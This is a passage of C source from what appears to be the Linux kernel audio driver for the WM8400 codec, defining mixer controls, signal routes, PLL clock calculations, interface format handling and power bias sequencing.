AINLMUX */ static const char *wm8400_ainlmux[] = {"INMIXL Mix", "RXVOICE Mix", "DIFFINL Mix"}; static SOC_ENUM_SINGLE_DECL(wm8400_ainlmux_enum, WM8400_INPUT_MIXER1, WM8400_AINLMODE_SHIFT, wm8400_ainlmux); static const struct snd_kcontrol_new wm8400_dapm_ainlmux_controls = SOC_DAPM_ENUM("Route", wm8400_ainlmux_enum); /* DIFFINL */ /* AINRMUX */ static const char *wm8400_ainrmux[] = {"INMIXR Mix", "RXVOICE Mix", "DIFFINR Mix"}; static SOC_ENUM_SINGLE_DECL(wm8400_ainrmux_enum, WM8400_INPUT_MIXER1, WM8400_AINRMODE_SHIFT, wm8400_ainrmux); static const struct snd_kcontrol_new wm8400_dapm_ainrmux_controls = SOC_DAPM_ENUM("Route", wm8400_ainrmux_enum); /* RXVOICE */ static const struct snd_kcontrol_new wm8400_dapm_rxvoice_controls[] = { SOC_DAPM_SINGLE_TLV("LIN4/RXN", WM8400_INPUT_MIXER5, WM8400_LR4BVOL_SHIFT, WM8400_LR4BVOL_MASK, 0, in_mix_tlv), SOC_DAPM_SINGLE_TLV("RIN4/RXP", WM8400_INPUT_MIXER6, WM8400_RL4BVOL_SHIFT, WM8400_RL4BVOL_MASK, 0, in_mix_tlv), }; /* LOMIX */ static const struct snd_kcontrol_new wm8400_dapm_lomix_controls[] = { SOC_DAPM_SINGLE("LOMIX Right ADC Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LRBLO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX Left ADC Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LLBLO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX RIN3 Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LRI3LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX LIN3 Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LLI3LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX RIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LR12LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX LIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LL12LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX Left DAC Switch", WM8400_OUTPUT_MIXER1, WM8400_LDLO_SHIFT, 1, 0), }; /* ROMIX */ static const struct snd_kcontrol_new wm8400_dapm_romix_controls[] = { SOC_DAPM_SINGLE("ROMIX Left ADC Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RLBRO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX Right ADC Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RRBRO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX LIN3 Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RLI3RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX RIN3 Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RRI3RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX LIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RL12RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX RIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RR12RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX Right DAC Switch", WM8400_OUTPUT_MIXER2, WM8400_RDRO_SHIFT, 1, 0), }; /* LONMIX */ static const struct snd_kcontrol_new wm8400_dapm_lonmix_controls[] = { SOC_DAPM_SINGLE("LONMIX Left Mixer PGA Switch", WM8400_LINE_MIXER1, WM8400_LLOPGALON_SHIFT, 1, 0), SOC_DAPM_SINGLE("LONMIX Right Mixer PGA Switch", WM8400_LINE_MIXER1, WM8400_LROPGALON_SHIFT, 1, 0), SOC_DAPM_SINGLE("LONMIX Inverted LOP Switch", WM8400_LINE_MIXER1, WM8400_LOPLON_SHIFT, 1, 0), }; /* LOPMIX */ static const struct snd_kcontrol_new wm8400_dapm_lopmix_controls[] = { SOC_DAPM_SINGLE("LOPMIX Right Mic Bypass Switch", WM8400_LINE_MIXER1, WM8400_LR12LOP_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOPMIX Left Mic Bypass Switch", WM8400_LINE_MIXER1, WM8400_LL12LOP_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOPMIX Left Mixer PGA Switch", WM8400_LINE_MIXER1, WM8400_LLOPGALOP_SHIFT, 1, 0), }; /* RONMIX */ static const struct snd_kcontrol_new wm8400_dapm_ronmix_controls[] = { SOC_DAPM_SINGLE("RONMIX Right Mixer PGA Switch", WM8400_LINE_MIXER2, WM8400_RROPGARON_SHIFT, 1, 0), SOC_DAPM_SINGLE("RONMIX Left Mixer PGA Switch", WM8400_LINE_MIXER2, WM8400_RLOPGARON_SHIFT, 1, 0), SOC_DAPM_SINGLE("RONMIX Inverted ROP Switch", WM8400_LINE_MIXER2, WM8400_ROPRON_SHIFT, 1, 0), }; /* ROPMIX */ static const struct snd_kcontrol_new wm8400_dapm_ropmix_controls[] = { SOC_DAPM_SINGLE("ROPMIX Left Mic Bypass Switch", WM8400_LINE_MIXER2, WM8400_RL12ROP_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROPMIX Right Mic Bypass Switch", WM8400_LINE_MIXER2, WM8400_RR12ROP_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROPMIX Right Mixer PGA Switch", WM8400_LINE_MIXER2, WM8400_RROPGAROP_SHIFT, 1, 0), }; /* OUT3MIX */ static const struct snd_kcontrol_new wm8400_dapm_out3mix_controls[] = { SOC_DAPM_SINGLE("OUT3MIX LIN4/RXP Bypass Switch", WM8400_OUT3_4_MIXER, WM8400_LI4O3_SHIFT, 1, 0), SOC_DAPM_SINGLE("OUT3MIX Left Out PGA Switch", WM8400_OUT3_4_MIXER, WM8400_LPGAO3_SHIFT, 1, 0), }; /* OUT4MIX */ static const struct snd_kcontrol_new wm8400_dapm_out4mix_controls[] = { SOC_DAPM_SINGLE("OUT4MIX Right Out PGA Switch", WM8400_OUT3_4_MIXER, WM8400_RPGAO4_SHIFT, 1, 0), SOC_DAPM_SINGLE("OUT4MIX RIN4/RXP Bypass Switch", WM8400_OUT3_4_MIXER, WM8400_RI4O4_SHIFT, 1, 0), }; /* SPKMIX */ static const struct snd_kcontrol_new wm8400_dapm_spkmix_controls[] = { SOC_DAPM_SINGLE("SPKMIX LIN2 Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_LI2SPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX LADC Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_LB2SPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Left Mixer PGA Switch", WM8400_SPEAKER_MIXER, WM8400_LOPGASPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Left DAC Switch", WM8400_SPEAKER_MIXER, WM8400_LDSPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Right DAC Switch", WM8400_SPEAKER_MIXER, WM8400_RDSPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Right Mixer PGA Switch", WM8400_SPEAKER_MIXER, WM8400_ROPGASPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX RADC Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_RL12ROP_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX RIN2 Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_RI2SPK_SHIFT, 1, 0), }; static const struct snd_soc_dapm_widget wm8400_dapm_widgets[] = { /* Input Side */ /* Input Lines */ SND_SOC_DAPM_INPUT("LIN1"), SND_SOC_DAPM_INPUT("LIN2"), SND_SOC_DAPM_INPUT("LIN3"), SND_SOC_DAPM_INPUT("LIN4/RXN"), SND_SOC_DAPM_INPUT("RIN3"), SND_SOC_DAPM_INPUT("RIN4/RXP"), SND_SOC_DAPM_INPUT("RIN1"), SND_SOC_DAPM_INPUT("RIN2"), SND_SOC_DAPM_INPUT("Internal ADC Source"), /* DACs */ SND_SOC_DAPM_ADC("Left ADC", "Left Capture", WM8400_POWER_MANAGEMENT_2, WM8400_ADCL_ENA_SHIFT, 0), SND_SOC_DAPM_ADC("Right ADC", "Right Capture", WM8400_POWER_MANAGEMENT_2, WM8400_ADCR_ENA_SHIFT, 0), /* Input PGAs */ SND_SOC_DAPM_MIXER("LIN12 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_LIN12_ENA_SHIFT, 0, &wm8400_dapm_lin12_pga_controls[0], ARRAY_SIZE(wm8400_dapm_lin12_pga_controls)), SND_SOC_DAPM_MIXER("LIN34 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_LIN34_ENA_SHIFT, 0, &wm8400_dapm_lin34_pga_controls[0], ARRAY_SIZE(wm8400_dapm_lin34_pga_controls)), SND_SOC_DAPM_MIXER("RIN12 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_RIN12_ENA_SHIFT, 0, &wm8400_dapm_rin12_pga_controls[0], ARRAY_SIZE(wm8400_dapm_rin12_pga_controls)), SND_SOC_DAPM_MIXER("RIN34 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_RIN34_ENA_SHIFT, 0, &wm8400_dapm_rin34_pga_controls[0], ARRAY_SIZE(wm8400_dapm_rin34_pga_controls)), SND_SOC_DAPM_SUPPLY("INL", WM8400_POWER_MANAGEMENT_2, WM8400_AINL_ENA_SHIFT, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("INR", WM8400_POWER_MANAGEMENT_2, WM8400_AINR_ENA_SHIFT, 0, NULL, 0), /* INMIXL */ SND_SOC_DAPM_MIXER("INMIXL", SND_SOC_NOPM, 0, 0, &wm8400_dapm_inmixl_controls[0], ARRAY_SIZE(wm8400_dapm_inmixl_controls)), /* AINLMUX */ SND_SOC_DAPM_MUX("AILNMUX", SND_SOC_NOPM, 0, 0, &wm8400_dapm_ainlmux_controls), /* INMIXR */ SND_SOC_DAPM_MIXER("INMIXR", SND_SOC_NOPM, 0, 0, &wm8400_dapm_inmixr_controls[0], ARRAY_SIZE(wm8400_dapm_inmixr_controls)), /* AINRMUX */ SND_SOC_DAPM_MUX("AIRNMUX", SND_SOC_NOPM, 0, 0, &wm8400_dapm_ainrmux_controls), /* Output Side */ /* DACs */ SND_SOC_DAPM_DAC("Left DAC", "Left Playback", WM8400_POWER_MANAGEMENT_3, WM8400_DACL_ENA_SHIFT, 0), SND_SOC_DAPM_DAC("Right DAC", "Right Playback", WM8400_POWER_MANAGEMENT_3, WM8400_DACR_ENA_SHIFT, 0), /* LOMIX */ SND_SOC_DAPM_MIXER_E("LOMIX", WM8400_POWER_MANAGEMENT_3, WM8400_LOMIX_ENA_SHIFT, 0, &wm8400_dapm_lomix_controls[0], ARRAY_SIZE(wm8400_dapm_lomix_controls), outmixer_event, SND_SOC_DAPM_PRE_REG), /* LONMIX */ SND_SOC_DAPM_MIXER("LONMIX", WM8400_POWER_MANAGEMENT_3, WM8400_LON_ENA_SHIFT, 0, &wm8400_dapm_lonmix_controls[0], ARRAY_SIZE(wm8400_dapm_lonmix_controls)), /* LOPMIX */ SND_SOC_DAPM_MIXER("LOPMIX", WM8400_POWER_MANAGEMENT_3, WM8400_LOP_ENA_SHIFT, 0, &wm8400_dapm_lopmix_controls[0], ARRAY_SIZE(wm8400_dapm_lopmix_controls)), /* OUT3MIX */ SND_SOC_DAPM_MIXER("OUT3MIX", WM8400_POWER_MANAGEMENT_1, WM8400_OUT3_ENA_SHIFT, 0, &wm8400_dapm_out3mix_controls[0], ARRAY_SIZE(wm8400_dapm_out3mix_controls)), /* SPKMIX */ SND_SOC_DAPM_MIXER_E("SPKMIX", WM8400_POWER_MANAGEMENT_1, WM8400_SPK_ENA_SHIFT, 0, &wm8400_dapm_spkmix_controls[0], ARRAY_SIZE(wm8400_dapm_spkmix_controls), outmixer_event, SND_SOC_DAPM_PRE_REG), /* OUT4MIX */ SND_SOC_DAPM_MIXER("OUT4MIX", WM8400_POWER_MANAGEMENT_1, WM8400_OUT4_ENA_SHIFT, 0, &wm8400_dapm_out4mix_controls[0], ARRAY_SIZE(wm8400_dapm_out4mix_controls)), /* ROPMIX */ SND_SOC_DAPM_MIXER("ROPMIX", WM8400_POWER_MANAGEMENT_3, WM8400_ROP_ENA_SHIFT, 0, &wm8400_dapm_ropmix_controls[0], ARRAY_SIZE(wm8400_dapm_ropmix_controls)), /* RONMIX */ SND_SOC_DAPM_MIXER("RONMIX", WM8400_POWER_MANAGEMENT_3, WM8400_RON_ENA_SHIFT, 0, &wm8400_dapm_ronmix_controls[0], ARRAY_SIZE(wm8400_dapm_ronmix_controls)), /* ROMIX */ SND_SOC_DAPM_MIXER_E("ROMIX", WM8400_POWER_MANAGEMENT_3, WM8400_ROMIX_ENA_SHIFT, 0, &wm8400_dapm_romix_controls[0], ARRAY_SIZE(wm8400_dapm_romix_controls), outmixer_event, SND_SOC_DAPM_PRE_REG), /* LOUT PGA */ SND_SOC_DAPM_PGA("LOUT PGA", WM8400_POWER_MANAGEMENT_1, WM8400_LOUT_ENA_SHIFT, 0, NULL, 0), /* ROUT PGA */ SND_SOC_DAPM_PGA("ROUT PGA", WM8400_POWER_MANAGEMENT_1, WM8400_ROUT_ENA_SHIFT, 0, NULL, 0), /* LOPGA */ SND_SOC_DAPM_PGA("LOPGA", WM8400_POWER_MANAGEMENT_3, WM8400_LOPGA_ENA_SHIFT, 0, NULL, 0), /* ROPGA */ SND_SOC_DAPM_PGA("ROPGA", WM8400_POWER_MANAGEMENT_3, WM8400_ROPGA_ENA_SHIFT, 0, NULL, 0), /* MICBIAS */ SND_SOC_DAPM_SUPPLY("MICBIAS", WM8400_POWER_MANAGEMENT_1, WM8400_MIC1BIAS_ENA_SHIFT, 0, NULL, 0), SND_SOC_DAPM_OUTPUT("LON"), SND_SOC_DAPM_OUTPUT("LOP"), SND_SOC_DAPM_OUTPUT("OUT3"), SND_SOC_DAPM_OUTPUT("LOUT"), SND_SOC_DAPM_OUTPUT("SPKN"), SND_SOC_DAPM_OUTPUT("SPKP"), SND_SOC_DAPM_OUTPUT("ROUT"), SND_SOC_DAPM_OUTPUT("OUT4"), SND_SOC_DAPM_OUTPUT("ROP"), SND_SOC_DAPM_OUTPUT("RON"), SND_SOC_DAPM_OUTPUT("Internal DAC Sink"), }; static const struct snd_soc_dapm_route wm8400_dapm_routes[] = { /* Make DACs turn on when playing even if not mixed into any outputs */ {"Internal DAC Sink", NULL, "Left DAC"}, {"Internal DAC Sink", NULL, "Right DAC"}, /* Make ADCs turn on when recording * even if not mixed from any inputs */ {"Left ADC", NULL, "Internal ADC Source"}, {"Right ADC", NULL, "Internal ADC Source"}, /* Input Side */ /* LIN12 PGA */ {"LIN12 PGA", "LIN1 Switch", "LIN1"}, {"LIN12 PGA", "LIN2 Switch", "LIN2"}, /* LIN34 PGA */ {"LIN34 PGA", "LIN3 Switch", "LIN3"}, {"LIN34 PGA", "LIN4 Switch", "LIN4/RXN"}, /* INMIXL */ {"INMIXL", NULL, "INL"}, {"INMIXL", "Record Left Volume", "LOMIX"}, {"INMIXL", "LIN2 Volume", "LIN2"}, {"INMIXL", "LINPGA12 Switch", "LIN12 PGA"}, {"INMIXL", "LINPGA34 Switch", "LIN34 PGA"}, /* AILNMUX */ {"AILNMUX", NULL, "INL"}, {"AILNMUX", "INMIXL Mix", "INMIXL"}, {"AILNMUX", "DIFFINL Mix", "LIN12 PGA"}, {"AILNMUX", "DIFFINL Mix", "LIN34 PGA"}, {"AILNMUX", "RXVOICE Mix", "LIN4/RXN"}, {"AILNMUX", "RXVOICE Mix", "RIN4/RXP"}, /* ADC */ {"Left ADC", NULL, "AILNMUX"}, /* RIN12 PGA */ {"RIN12 PGA", "RIN1 Switch", "RIN1"}, {"RIN12 PGA", "RIN2 Switch", "RIN2"}, /* RIN34 PGA */ {"RIN34 PGA", "RIN3 Switch", "RIN3"}, {"RIN34 PGA", "RIN4 Switch", "RIN4/RXP"}, /* INMIXR */ {"INMIXR", NULL, "INR"}, {"INMIXR", "Record Right Volume", "ROMIX"}, {"INMIXR", "RIN2 Volume", "RIN2"}, {"INMIXR", "RINPGA12 Switch", "RIN12 PGA"}, {"INMIXR", "RINPGA34 Switch", "RIN34 PGA"}, /* AIRNMUX */ {"AIRNMUX", NULL, "INR"}, {"AIRNMUX", "INMIXR Mix", "INMIXR"}, {"AIRNMUX", "DIFFINR Mix", "RIN12 PGA"}, {"AIRNMUX", "DIFFINR Mix", "RIN34 PGA"}, {"AIRNMUX", "RXVOICE Mix", "LIN4/RXN"}, {"AIRNMUX", "RXVOICE Mix", "RIN4/RXP"}, /* ADC */ {"Right ADC", NULL, "AIRNMUX"}, /* LOMIX */ {"LOMIX", "LOMIX RIN3 Bypass Switch", "RIN3"}, {"LOMIX", "LOMIX LIN3 Bypass Switch", "LIN3"}, {"LOMIX", "LOMIX LIN12 PGA Bypass Switch", "LIN12 PGA"}, {"LOMIX", "LOMIX RIN12 PGA Bypass Switch", "RIN12 PGA"}, {"LOMIX", "LOMIX Right ADC Bypass Switch", "AIRNMUX"}, {"LOMIX", "LOMIX Left ADC Bypass Switch", "AILNMUX"}, {"LOMIX", "LOMIX Left DAC Switch", "Left DAC"}, /* ROMIX */ {"ROMIX", "ROMIX RIN3 Bypass Switch", "RIN3"}, {"ROMIX", "ROMIX LIN3 Bypass Switch", "LIN3"}, {"ROMIX", "ROMIX LIN12 PGA Bypass Switch", "LIN12 PGA"}, {"ROMIX", "ROMIX RIN12 PGA Bypass Switch", "RIN12 PGA"}, {"ROMIX", "ROMIX Right ADC Bypass Switch", "AIRNMUX"}, {"ROMIX", "ROMIX Left ADC Bypass Switch", "AILNMUX"}, {"ROMIX", "ROMIX Right DAC Switch", "Right DAC"}, /* SPKMIX */ {"SPKMIX", "SPKMIX LIN2 Bypass Switch", "LIN2"}, {"SPKMIX", "SPKMIX RIN2 Bypass Switch", "RIN2"}, {"SPKMIX", "SPKMIX LADC Bypass Switch", "AILNMUX"}, {"SPKMIX", "SPKMIX RADC Bypass Switch", "AIRNMUX"}, {"SPKMIX", "SPKMIX Left Mixer PGA Switch", "LOPGA"}, {"SPKMIX", "SPKMIX Right Mixer PGA Switch", "ROPGA"}, {"SPKMIX", "SPKMIX Right DAC Switch", "Right DAC"}, {"SPKMIX", "SPKMIX Left DAC Switch", "Right DAC"}, /* LONMIX */ {"LONMIX", "LONMIX Left Mixer PGA Switch", "LOPGA"}, {"LONMIX", "LONMIX Right Mixer PGA Switch", "ROPGA"}, {"LONMIX", "LONMIX Inverted LOP Switch", "LOPMIX"}, /* LOPMIX */ {"LOPMIX", "LOPMIX Right Mic Bypass Switch", "RIN12 PGA"}, {"LOPMIX", "LOPMIX Left Mic Bypass Switch", "LIN12 PGA"}, {"LOPMIX", "LOPMIX Left Mixer PGA Switch", "LOPGA"}, /* OUT3MIX */ {"OUT3MIX", "OUT3MIX LIN4/RXP Bypass Switch", "LIN4/RXN"}, {"OUT3MIX", "OUT3MIX Left Out PGA Switch", "LOPGA"}, /* OUT4MIX */ {"OUT4MIX", "OUT4MIX Right Out PGA Switch", "ROPGA"}, {"OUT4MIX", "OUT4MIX RIN4/RXP Bypass Switch", "RIN4/RXP"}, /* RONMIX */ {"RONMIX", "RONMIX Right Mixer PGA Switch", "ROPGA"}, {"RONMIX", "RONMIX Left Mixer PGA Switch", "LOPGA"}, {"RONMIX", "RONMIX Inverted ROP Switch", "ROPMIX"}, /* ROPMIX */ {"ROPMIX", "ROPMIX Left Mic Bypass Switch", "LIN12 PGA"}, {"ROPMIX", "ROPMIX Right Mic Bypass Switch", "RIN12 PGA"}, {"ROPMIX", "ROPMIX Right Mixer PGA Switch", "ROPGA"}, /* Out Mixer PGAs */ {"LOPGA", NULL, "LOMIX"}, {"ROPGA", NULL, "ROMIX"}, {"LOUT PGA", NULL, "LOMIX"}, {"ROUT PGA", NULL, "ROMIX"}, /* Output Pins */ {"LON", NULL, "LONMIX"}, {"LOP", NULL, "LOPMIX"}, {"OUT3", NULL, "OUT3MIX"}, {"LOUT", NULL, "LOUT PGA"}, {"SPKN", NULL, "SPKMIX"}, {"ROUT", NULL, "ROUT PGA"}, {"OUT4", NULL, "OUT4MIX"}, {"ROP", NULL, "ROPMIX"}, {"RON", NULL, "RONMIX"}, }; /* * Clock after FLL and dividers */ static int wm8400_set_dai_sysclk(struct snd_soc_dai *codec_dai, int clk_id, unsigned int freq, int dir) { struct snd_soc_codec *codec = codec_dai->codec; struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec); wm8400->sysclk = freq; return 0; } struct fll_factors { u16 n; u16 k; u16 outdiv; u16 fratio; u16 freq_ref; }; #define FIXED_FLL_SIZE ((1 << 16) * 10) static int fll_factors(struct wm8400_priv *wm8400, struct fll_factors *factors, unsigned int Fref, unsigned int Fout) { u64 Kpart; unsigned int K, Nmod, target; factors->outdiv = 2; while (Fout * factors->outdiv < 90000000 || Fout * factors->outdiv > 100000000) { factors->outdiv *= 2; if (factors->outdiv > 32) { dev_err(wm8400->wm8400->dev, "Unsupported FLL output frequency %uHz\n", Fout); return -EINVAL; } } target = Fout * factors->outdiv; factors->outdiv = factors->outdiv >> 2; if (Fref < 48000) factors->freq_ref = 1; else factors->freq_ref = 0; if (Fref < 1000000) factors->fratio = 9; else factors->fratio = 0; /* Ensure we have a fractional part */ do { if (Fref < 1000000) factors->fratio--; else factors->fratio++; if (factors->fratio < 1 || factors->fratio > 8) { dev_err(wm8400->wm8400->dev, "Unable to calculate FRATIO\n"); return -EINVAL; } factors->n = target / (Fref * factors->fratio); Nmod = target % (Fref * factors->fratio); } while (Nmod == 0); /* Calculate fractional part - scale up so we can round. */ Kpart = FIXED_FLL_SIZE * (long long)Nmod; do_div(Kpart, (Fref * factors->fratio)); K = Kpart & 0xFFFFFFFF; if ((K % 10) >= 5) K += 5; /* Move down to proper range now rounding is done */ factors->k = K / 10; dev_dbg(wm8400->wm8400->dev, "FLL: Fref=%u Fout=%u N=%x K=%x, FRATIO=%x OUTDIV=%x\n", Fref, Fout, factors->n, factors->k, factors->fratio, factors->outdiv); return 0; } static int wm8400_set_dai_pll(struct snd_soc_dai *codec_dai, int pll_id, int source, unsigned int freq_in, unsigned int freq_out) { struct snd_soc_codec *codec = codec_dai->codec; struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec); struct fll_factors factors; int ret; u16 reg; if (freq_in == wm8400->fll_in && freq_out == wm8400->fll_out) return 0; if (freq_out) { ret = fll_factors(wm8400, &factors, freq_in, freq_out); if (ret != 0) return ret; } else { /* Bodge GCC 4.4.0 uninitialised variable warning - it * doesn't seem capable of working out that we exit if * freq_out is 0 before any of the uses. */ memset(&factors, 0, sizeof(factors)); } wm8400->fll_out = freq_out; wm8400->fll_in = freq_in; /* We *must* disable the FLL before any changes */ reg = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_2); reg &= ~WM8400_FLL_ENA; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_2, reg); reg = snd_soc_read(codec, WM8400_FLL_CONTROL_1); reg &= ~WM8400_FLL_OSC_ENA; snd_soc_write(codec, WM8400_FLL_CONTROL_1, reg); if (!freq_out) return 0; reg &= ~(WM8400_FLL_REF_FREQ | WM8400_FLL_FRATIO_MASK); reg |= WM8400_FLL_FRAC | factors.fratio; reg |= factors.freq_ref << WM8400_FLL_REF_FREQ_SHIFT; snd_soc_write(codec, WM8400_FLL_CONTROL_1, reg); snd_soc_write(codec, WM8400_FLL_CONTROL_2, factors.k); snd_soc_write(codec, WM8400_FLL_CONTROL_3, factors.n); reg = snd_soc_read(codec, WM8400_FLL_CONTROL_4); reg &= ~WM8400_FLL_OUTDIV_MASK; reg |= factors.outdiv; snd_soc_write(codec, WM8400_FLL_CONTROL_4, reg); return 0; } /* * Sets ADC and Voice DAC format. */ static int wm8400_set_dai_fmt(struct snd_soc_dai *codec_dai, unsigned int fmt) { struct snd_soc_codec *codec = codec_dai->codec; u16 audio1, audio3; audio1 = snd_soc_read(codec, WM8400_AUDIO_INTERFACE_1); audio3 = snd_soc_read(codec, WM8400_AUDIO_INTERFACE_3); /* set master/slave audio interface */ switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) { case SND_SOC_DAIFMT_CBS_CFS: audio3 &= ~WM8400_AIF_MSTR1; break; case SND_SOC_DAIFMT_CBM_CFM: audio3 |= WM8400_AIF_MSTR1; break; default: return -EINVAL; } audio1 &= ~WM8400_AIF_FMT_MASK; /* interface format */ switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) { case SND_SOC_DAIFMT_I2S: audio1 |= WM8400_AIF_FMT_I2S; audio1 &= ~WM8400_AIF_LRCLK_INV; break; case SND_SOC_DAIFMT_RIGHT_J: audio1 |= WM8400_AIF_FMT_RIGHTJ; audio1 &= ~WM8400_AIF_LRCLK_INV; break; case SND_SOC_DAIFMT_LEFT_J: audio1 |= WM8400_AIF_FMT_LEFTJ; audio1 &= ~WM8400_AIF_LRCLK_INV; break; case SND_SOC_DAIFMT_DSP_A: audio1 |= WM8400_AIF_FMT_DSP; audio1 &= ~WM8400_AIF_LRCLK_INV; break; case SND_SOC_DAIFMT_DSP_B: audio1 |= WM8400_AIF_FMT_DSP | WM8400_AIF_LRCLK_INV; break; default: return -EINVAL; } snd_soc_write(codec, WM8400_AUDIO_INTERFACE_1, audio1); snd_soc_write(codec, WM8400_AUDIO_INTERFACE_3, audio3); return 0; } static int wm8400_set_dai_clkdiv(struct snd_soc_dai *codec_dai, int div_id, int div) { struct snd_soc_codec *codec = codec_dai->codec; u16 reg; switch (div_id) { case WM8400_MCLK_DIV: reg = snd_soc_read(codec, WM8400_CLOCKING_2) & ~WM8400_MCLK_DIV_MASK; snd_soc_write(codec, WM8400_CLOCKING_2, reg | div); break; case WM8400_DACCLK_DIV: reg = snd_soc_read(codec, WM8400_CLOCKING_2) & ~WM8400_DAC_CLKDIV_MASK; snd_soc_write(codec, WM8400_CLOCKING_2, reg | div); break; case WM8400_ADCCLK_DIV: reg = snd_soc_read(codec, WM8400_CLOCKING_2) & ~WM8400_ADC_CLKDIV_MASK; snd_soc_write(codec, WM8400_CLOCKING_2, reg | div); break; case WM8400_BCLK_DIV: reg = snd_soc_read(codec, WM8400_CLOCKING_1) & ~WM8400_BCLK_DIV_MASK; snd_soc_write(codec, WM8400_CLOCKING_1, reg | div); break; default: return -EINVAL; } return 0; } /* * Set PCM DAI bit size and sample rate. */ static int wm8400_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params, struct snd_soc_dai *dai) { struct snd_soc_codec *codec = dai->codec; u16 audio1 = snd_soc_read(codec, WM8400_AUDIO_INTERFACE_1); audio1 &= ~WM8400_AIF_WL_MASK; /* bit size */ switch (params_width(params)) { case 16: break; case 20: audio1 |= WM8400_AIF_WL_20BITS; break; case 24: audio1 |= WM8400_AIF_WL_24BITS; break; case 32: audio1 |= WM8400_AIF_WL_32BITS; break; } snd_soc_write(codec, WM8400_AUDIO_INTERFACE_1, audio1); return 0; } static int wm8400_mute(struct snd_soc_dai *dai, int mute) { struct snd_soc_codec *codec = dai->codec; u16 val = snd_soc_read(codec, WM8400_DAC_CTRL) & ~WM8400_DAC_MUTE; if (mute) snd_soc_write(codec, WM8400_DAC_CTRL, val | WM8400_DAC_MUTE); else snd_soc_write(codec, WM8400_DAC_CTRL, val); return 0; } /* TODO: set bias for best performance at standby */ static int wm8400_set_bias_level(struct snd_soc_codec *codec, enum snd_soc_bias_level level) { struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec); u16 val; int ret; switch (level) { case SND_SOC_BIAS_ON: break; case SND_SOC_BIAS_PREPARE: /* VMID=2*50k */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1) & ~WM8400_VMID_MODE_MASK; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val | 0x2); break; case SND_SOC_BIAS_STANDBY: if (codec->dapm.bias_level == SND_SOC_BIAS_OFF) { ret = regulator_bulk_enable(ARRAY_SIZE(power), &power[0]); if (ret != 0) { dev_err(wm8400->wm8400->dev, "Failed to enable regulators: %d\n", ret); return ret; } snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, WM8400_CODEC_ENA | WM8400_SYSCLK_ENA); /* Enable POBCTRL, SOFT_ST, VMIDTOG and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_SOFTST | WM8400_BUFDCOPEN | WM8400_POBCTRL); msleep(50); /* Enable VREF & VMID at 2x50k */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1); val |= 0x2 | WM8400_VREF_ENA; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val); /* Enable BUFIOEN */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_SOFTST | WM8400_BUFDCOPEN | WM8400_POBCTRL | WM8400_BUFIOEN); /* disable POBCTRL, SOFT_ST and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_BUFIOEN); } /* VMID=2*300k */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1) & ~WM8400_VMID_MODE_MASK; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val | 0x4); break; case SND_SOC_BIAS_OFF: /* Enable POBCTRL and SOFT_ST */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_SOFTST | WM8400_POBCTRL | WM8400_BUFIOEN); /* Enable POBCTRL, SOFT_ST and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, 